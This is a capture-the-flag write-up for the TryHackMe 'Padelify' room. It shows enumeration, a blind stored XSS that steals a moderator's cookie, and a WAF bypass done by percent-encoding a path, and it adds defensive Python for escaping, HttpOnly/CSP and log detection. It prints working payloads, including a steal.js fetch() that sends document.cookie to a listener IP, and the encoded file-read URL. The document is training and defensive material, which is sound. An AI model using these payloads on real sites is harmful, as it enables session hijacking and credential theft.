Room

https://tryhackme.com/room/padelify

Enumeration

The description of this room suggests it is a web server hosted on port 80, but let's run nmap just to make sure.

nmap -sC -sV -sT -p- 10.64.178.173

As expected, the only thing open is a web server.


The next step is to enumerate the directories. For this, we will be using dirsearch.

dirsearch -u http://10.64.178.173/
Note: dirsearch automatically sends a realistic User-Agent header. If you use a tool like Gobuster, you will have to set one manually.

When we visit the site, we are greeted with a registration page.


Let's check the log and config paths:


Requesting app.conf is blocked by the WAF, so we can assume credentials are stored in it.

The logs path contains a single file, error.log:


This confirms the existence of creds in the config file.

Moderator Flag

Pro tip: When a CTF has a site saying a moderator will review something, there is a 95% chance you can steal the cookie using stored XSS.

To test for this possibility, we first need to set up a web server using Python. Since it is the moderator, not us, who will view the submission, the XSS will probably be blind, so we need a listener to catch the callback.

python3 -m http.server

Now we need to confirm that the injection is even possible. A simple payload that just loads a script from our listener is enough for that:

<script src="http://10.64.80.99:8000"></script>

We can input this in the register form as shown:


After submitting the registration, we check our server's log for an incoming request, which would confirm that the XSS fired.


As we can see, a request came in. Now we can look for ways to weaponize this.

Weaponizing the XSS

Now that we have confirmed the web app is vulnerable to XSS, we can look for ways to use it to gain access to the admin panel. Let's try a basic cookie-stealing payload:

<img src=x onerror="location='http://10.64.80.99:8000/?c='+document.cookie">

Well, that didn't work. Since the earlier <script src> payload did, we can use it to include a remote file instead.

Let's start by writing a simple JS file, steal.js, that sends the cookie to our listener (this time on port 6767):

fetch('http://10.64.80.99:6767/?c=' + document.cookie);

We can now load that file through the XSS to exfiltrate the cookie:

<script src="http://10.64.80.99:6767/steal.js"></script>

We receive a connection back with the cookie.


Next, replace our own session cookie in the browser with the stolen one.


And we are in!
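From the defender's side, both findings in this section (the moderator review page rendering submitted text as markup, and the session cookie being readable from document.cookie) come down to two missing controls: output encoding and HttpOnly. The following is an added example, not code from the room or from this writeup; it shows the vulnerable rendering pattern beside its escaped form, a Set-Cookie line that keeps the session out of script reach, and a CSP that would block the remote script include used above. The field names, the cookie name "session", and the table layout are assumptions; the two payload strings are the ones from this writeup, reused here only as test input.

```python
import html
from html.parser import HTMLParser

# Constructed samples: the two payload shapes used against the registration
# form in this room, used here only as input to the rendering functions.
XSS_SAMPLES = [
    '<script src="http://10.64.80.99:6767/steal.js"></script>',
    '<img src=x onerror="location=\'http://10.64.80.99:8000/?c=\'+document.cookie">',
]


def render_unsafe(username: str, bio: str) -> str:
    """The vulnerable pattern: user-supplied fields are interpolated straight
    into the HTML that the moderator's browser renders."""
    return f"<tr><td>{username}</td><td>{bio}</td></tr>"


def render_review_row(username: str, bio: str) -> str:
    """Hardened version: every user-controlled value is HTML-escaped (quotes
    included) so it can only ever appear as text, never as markup."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(username, quote=True),
        html.escape(bio, quote=True),
    )


def session_cookie_header(token: str) -> str:
    """Set-Cookie line for the moderator session (hypothetical cookie name).
    HttpOnly keeps the value out of document.cookie, so a script that does run
    has nothing to exfiltrate; SameSite=Strict limits cross-site reuse."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Strict; Path=/"


def security_headers() -> dict:
    """Response headers for the review page (assumed values). The CSP allows
    scripts from the site's own origin only, which blocks both the remote
    <script src=...> include and the inline onerror handler."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


class _TagCollector(HTMLParser):
    """Collects start-tag names, i.e. what a browser would treat as elements."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(rendered: str) -> list:
    """Return the element names an HTML parser finds in the rendered fragment."""
    collector = _TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for payload in XSS_SAMPLES:
        print("unsafe  :", tags_in(render_unsafe("alice", payload)))
        print("escaped :", tags_in(render_review_row("alice", payload)))
    print(session_cookie_header("<token>"))
```

Running the block shows the unsafe renderer producing a script or img element for each sample, while the escaped renderer only ever yields the tr/td elements of the template. Note that escaping alone would have stopped this room's XSS; HttpOnly and the CSP are defence in depth for the case where some other injection point is missed.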


Admin Flag

After looking around for a bit, we find a possible SSRF vector.


Just inputting config/app.conf gets us blocked.

After playing around a bit, we find that URL-encoding the path gets past the filter:

http://10.64.178.172/live.php?page=%63%6f%6e%66%69%67%2f%61%70%70%2e%63%6f%6e%66
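The bypass works because the WAF compares the raw parameter against a blocklist while the application percent-decodes it before opening the file. The following is an added example, not code from the room, showing the defender's fix and the matching detection: canonicalize the value (decode until stable, collapse ./ and ../, strip leading slashes) and compare that form, and run the same canonicalization over access logs to find encoded requests that slipped through. The SENSITIVE_PATHS set, the assumption that page= resolves relative to the web root, and the three log lines are all constructed for the example; the encoded value is the one from this writeup.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths the application must never serve through live.php?page=. The set is an
# assumption for this example; the room only shows config/app.conf being read.
SENSITIVE_PATHS = {"config/app.conf", "logs/error.log"}

# Constructed access-log lines in common log format: a normal page, the plain
# request the WAF blocked, and the percent-encoded one that got through.
SAMPLE_LOG = [
    '10.64.80.99 - - [01/Jan/2024:10:00:00 +0000] "GET /live.php?page=home HTTP/1.1" 200 512',
    '10.64.80.99 - - [01/Jan/2024:10:00:05 +0000] "GET /live.php?page=config/app.conf HTTP/1.1" 403 0',
    '10.64.80.99 - - [01/Jan/2024:10:00:09 +0000] "GET /live.php?page=%63%6f%6e%66%69%67%2f%61%70%70%2e%63%6f%6e%66 HTTP/1.1" 200 1024',
]

_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def naive_is_blocked(page_param: str) -> bool:
    """A string match on the raw parameter, which is what the WAF in this room
    appears to do: the encoded form never equals the blocklisted literal."""
    return page_param in SENSITIVE_PATHS


def canonicalize(page_param: str, max_rounds: int = 5) -> str:
    """Reduce the parameter to the path the application would actually open:
    percent-decode until the value stops changing (defeats double encoding),
    unify separators, collapse ./ and ../ segments, and drop leading slashes
    or parent references. Assumes page= is resolved relative to the web root."""
    value = page_param
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = posixpath.normpath(value.replace("\\", "/"))
    while value.startswith("/") or value.startswith("../"):
        value = value[1:] if value.startswith("/") else value[3:]
    return value


def is_blocked(page_param: str) -> bool:
    """Compare the canonical form, not the raw one."""
    return canonicalize(page_param) in SENSITIVE_PATHS


def flag_request_lines(log_lines):
    """Scan access-log lines and return (line_no, status, canonical_path) for
    every request whose page= value resolves to a sensitive file. A hit with a
    2xx status means the filter was bypassed."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        target, status = match.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for raw in query.get("page", []):
            canonical = canonicalize(raw)
            if canonical in SENSITIVE_PATHS:
                hits.append((line_no, status, canonical))
    return hits


if __name__ == "__main__":
    for hit in flag_request_lines(SAMPLE_LOG):
        print(hit)
```

On the sample log the scanner reports both the blocked request and the encoded one that returned 200; the latter is the line an analyst would want alerted on. A blocklist is still the weaker design, though: the durable fix for a page= style include is an allowlist of the pages the application actually means to serve.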

Now we can log in with the credentials from app.conf:


And we have the flag!
